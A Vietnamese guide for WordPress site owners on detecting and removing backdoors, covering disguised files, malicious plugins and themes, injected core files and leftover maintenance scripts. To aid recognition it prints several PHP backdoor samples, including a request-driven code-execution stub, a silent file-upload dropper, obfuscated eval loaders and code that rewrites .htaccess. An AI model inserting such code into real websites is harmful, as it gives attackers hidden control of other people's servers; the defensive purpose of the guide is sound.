Hướng dẫn tìm và loại bỏ Backdoors trên trang web WordPress của bạn

Backdoor là gì?

Backdoor là mã cho phép truy cập trái phép và thường không hạn chế vào một trang web bị xâm phạm, chúng cho phép những kẻ tấn công truy cập vào tất cả các tệp có trên Hosting. Backdoor có thể trông giống như mã php bình thường hoặc bị xáo trộn và bị ẩn. Backdoor có thể được chèn vào một tệp hợp lệ dưới dạng chỉ một dòng mã ngắn trông giống những đoạn mã bình thường khác hoặc một tệp độc lập. Truy cập backdoor cho phép kẻ tấn công đặt bất kỳ mã độc hại nào trên trang web, backdoor thường được tìm thấy cùng với các phần mềm độc hại khác.

Xác định xem trang web của bạn có bị nhiễm hay không?

Backdoor có thể khó tìm vì chúng thường là mã bị xáo trộn, thông thường nếu có một backdoor thì có những backdoor khác có thể giống hoặc không giống nhau. Đôi khi backdoor là những tập lệnh bảo trì không an toàn vô tình bị bỏ lại sau khi bảo trì trang web được ủy quyền.

Chủ sở hữu trang web thường không biết rằng backdoor tồn tại trên trang web, tuy nhiên nếu có bất kỳ phần mềm độc hại nào khác được tìm thấy trên trang web, có thể nhiều tệp backdoor hoặc mã chèn cũng tồn tại, cho phép kẻ tấn công xâm nhập vào trang web.

Cách tìm và loại bỏ backdoor trên trang

Việc loại bỏ backdoor yêu cầu phân tích mã trang web, backdoor thường được tìm thấy trong các tệp php trên máy chủ web, chúng có thể được chèn vào tệp lõi, plugin hoặc chủ đề của bạn hoặc chúng có thể là một tệp độc lập. Chúng có thể được tìm thấy trong bất kỳ thư mục nào có thể truy cập công khai trên máy chủ của bạn mà người đặt nó có thể dễ dàng truy cập.

Để loại bỏ backdoor, trước tiên hãy tạo một bản sao lưu các tệp trang web và cơ sở dữ liệu. Sẽ rất hữu ích khi xem lại các tệp nhật ký truy cập http thô của bạn, vì việc sử dụng backdoor thường được thực hiện thông qua một yêu cầu POST HTTP tới một tệp.

Tài khoản quản trị bị xâm phạm có thể cho phép kẻ tấn công sử dụng trình chỉnh sửa chủ đề cốt lõi để thêm backdoor vào tệp 404 của chủ đề. Bằng cách này mọi yêu cầu đến trang web của bạn tạo ra thông báo lỗi 404 sẽ cung cấp một cửa sau mà bất kỳ ai biết đến sự tồn tại của nó đều có thể sử dụng được.

Việc xóa backdoor yêu cầu tìm mã cho phép truy cập trái phép và xóa mã đó, nó yêu cầu sự hiểu biết về mã vận hành trang web của bạn.

Đọc thêm: Cách bảo mật website WordPress của bạn tránh bị hack chi tiết

Tệp backdoor giả mạo

Dưới đây là một số mẫu backdoor được tìm thấy dưới dạng tệp giả mạo hoặc tệp không phải là một phần của plugin cốt lõi, chủ đề hoặc hệ thống quản lý nội dung. Chúng có tên tương tự các tệp cốt lõi khác như xml.php, media.php, plugin.php,…và chúng có thể được đặt ở bất cứ đâu trên trang web. Mã trong tệp giả mạo có thể bắt đầu như sau:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<[email protected]&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43

Điều quan trọng là không chỉ tìm kiếm các tệp không liên quan trên trang web của bạn mà còn phải kiểm tra mọi tệp.

Chủ đề và plugin backdoor

Nếu tài khoản quản trị bị xâm phạm, những kẻ tấn công thường sử dụng plugin hoặc khả năng tải lên chủ đề của một trang web để thêm backdoor.

Nếu một plugin được thêm backdoor, nó có thể xuất hiện hoặc không xuất hiện trên trang quản trị plugin của bạn. Các tệp plugin độc hại thường bị ẩn khỏi chế độ xem và chỉ hiển thị trong hệ thống tệp thông qua trình quản lý tệp FTP của bạn. Chúng thường được đặt tên là những thứ có vẻ hữu ích, chẳng hạn như:

  • WordPress Support.
  • Login Wall.
  • Wp zipp.
  • Wp-Base-SEO.

Các plugin có thể được cài đặt giống như các plugin bình thường, được đặt tên như Akismet3 cùng với một số tệp Akismet hợp lệ cũ hơn nhưng có mã cửa hậu chứ trong các tệp được tải lên.

Các tệp chủ đề cũng có thể được thêm vào có chứa backdoor, chủ đề WordPress Sketch trong một thời gian là một chủ đề chứa đầy phần mềm độc hại phổ biến được tải lên với nhiều tệp backdoor bên trong nó. Chủ đề có thể hiển thị trong trang quản trị chủ đề hoặc có thể thiếu một số tệp và được liệt kê ở cuối trang đó là chủ đề không hoạt động vì thiếu một số tệp.

Nếu bạn có các chủ đề hoặc plugin mà bạn không nhận ra, hãy xóa chúng. Nhưng bạn cũng sẽ cần phải xem lại phần còn lại cảu các tệp của mình. THường thì backdoor là một phương tiện để thêm nhiều backdoor hơn trên toàn bộ trang web, bao gồm cả việc chỉnh sửa các tệp cốt lõi để thêm chức năng cửa sau bên trong chúng.

Xem ngay: Cách giúp bảo vệ trang web WordPress của bạn khỏi các cuộc tấn công DDoS

Chèn backdoor tệp cốt lõi

Các tệp cốt lõi của hệ thống quản lý nội dung của bạn có thể có các cửa hậu được chèn vào chúng, chúng có thể được thêm vào đầu tệp, cuối tệp và trong một số trường hợp được chèn vào giữa các mã tệp hợp lệ của chính tệp lõi.

Mã này hoặc mã giống nó thường được thêm vào đầu trang hợp lệ:

if (isset($_REQUEST['FILE'])){
$_FILE =$_REQUEST['92422e6d']('$_',$_REQUEST['FILE'].'($_);');
$_FILE(stripslashes($_REQUEST['HOST']));
}

Đây là một ví dụ khác.

@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000');
$size=$_POST['size'];
$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name'];
$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp);

Các backdoor khác rất khó hiểu và có thể bắt đầu như thế này:

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\

Thường thì sẽ có tham chiếu đến FilesMan ở đâu đó trong tệp backdoor.

$default_action = "FilesMan";

Đôi khi một cửa hậu ghi cụ thể nội dung độc hại vào một tệp cụ thể, trong trường hợp này, chuyển hướng tệp .htaccess.

$htaccess = str_replace( "#####​INCLUDE​#####", $ht2_code, $ht1_code );
@unlink( "[site path]/​public_html/​.htaccess" );
$fp = fopen( "[site path]/​public_html/​.htaccess", "w" );
fputs( $fp, $htaccess );
fclose( $fp );
@chmod( "[site path]/​public_html/​.htaccess", $chmod );
touch( "[site path]/​public_html/​.htaccess", $time );

Tập lệnh bảo trì không an toàn

Các kịch bản bảo trì đôi khi bị bỏ lại sau khi thực hiện bảo trì, những đoạn mã này sau đó bị những kẻ tấn công phát hiện và khai thác. Một kịch bản bảo trì phổ biến là Searchreplacedb2.php cho phép truy cập không hạn chế vào cơ sở dữ liệu trang web.

Tham khảo: Share, Dedicated, VPS Cloud,…Loại web Hosting nào tốt nhất?

Nhìn xa hơn backdoor

Backdoor thường được sử dụng như một phương tiện để kết thúc cùng với các trang độc hại khác. Nếu bạn có backdoor, nhiều khả năng bạn có phần mềm độc hại khác trên trang web của bạn như trang thư rác, liên kết thư rác, lừa đảo hoạt động hoặc đổi hướng độc hại.

Cho dù bạn đã tìm thấy loại backdoor nào trên trang web của mình, câu hỏi ở đây là: Làm thế nào nó có thể tồn lại ở đó? Có thể có các loại phần mềm độc hại hoặc lỗ hổng bảo mật khác trên trang web cỉa bạn đã cho phép kẻ tấn công có quyền truy cập vào trang web. Những kẻ tấn công thường đặt nhiều backdoor, một số giống nhau, một số khác nhau, vì vậy việc xem xét toàn bộ trang web là rất quan trọng.

Nếu bạn thấy bài viết này hữu ích, hãy chia sẻ nó để có thể giúp được nhiều người hơn.

Bình luận

Địa chỉ email của bạn sẽ không được công bố.